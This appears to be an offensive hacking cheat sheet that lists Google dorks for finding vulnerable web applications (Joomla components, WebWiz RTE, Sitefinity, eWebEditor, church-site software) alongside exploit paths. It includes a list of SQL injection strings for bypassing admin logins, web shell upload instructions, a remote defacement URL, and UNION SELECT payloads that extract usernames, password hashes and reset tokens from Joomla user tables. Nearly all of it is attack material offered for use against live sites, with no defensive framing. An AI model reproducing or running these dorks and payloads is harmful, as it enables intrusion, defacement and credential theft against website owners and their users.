inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”

WebWiz vulnerability (RTE upload vulnerability)
inurl:rte/my_documents/my_files/
inurl:/my_documents/my_files/
Exploit: /rte/RTE_popup_file_atch.asp

Editor vulnerability
inurl:editor/assetmanager/ (the search query can be refined)
Exploit: /Editor/assetmanager/assetmanager.asp

Joomla upload vulnerability
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Upload destination: /components/com_expose/expose/img/

Sitefinity: Login upload vulnerability
inurl:”Sitefinity: Login”
Exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Auto Login For Joomla
Dork .:old:. inurl:/administrator/index.php?autologin=1

---

BYPASS ADMIN ACCESS

Dorks:
Code:
inurl:admin.asp
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

Code:
‘ or 1=1 – 1'or’1'=’1 admin’– ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or 0=0 # ‘ or ‘x’='x ” or “x”=”x ‘) or (‘x’='x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’='a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’ or 1=1 – hi’ or ‘a’='a hi’) or (‘a’='a

----

Joomla Component com_smartformer shell upload
Google Dork inurl:"index.php?option=com_smartformer" & upload shell.php
Your shell : http://localhost/components/com_smartformer/files/yourshell.php

---

Ministry Web Designing Multiple Vulnerabilities
Exploit, bypass to login:
user: '=' 'or'
pass: '=' 'or'
Vulnerable sections:
inurl:/downloadcounter/admin/login.php
inurl:/mediaprogram/admin/index.php
inurl:/churchprogram/login.php

----

(Deface) Exploit (Remote Deface) Joomla Component
Dork : inurl:index.php?option=com_fabrik
Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

---

[Priv8] Joomla Com_content exploit - defacing Joomla websites
Dork : inurl:index.php?option=com_content & "/mambots/editors/fckeditor"
Vulnerable File : mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
You can exploit this vulnerable Joomla component and deface Joomla websites, and you can also sometimes upload your shell.

----

Exploit Joomla "com_artforms" reset password
Dork : inurl:"option com_artforms"
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
/index.php?option=com_user&view=reset
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users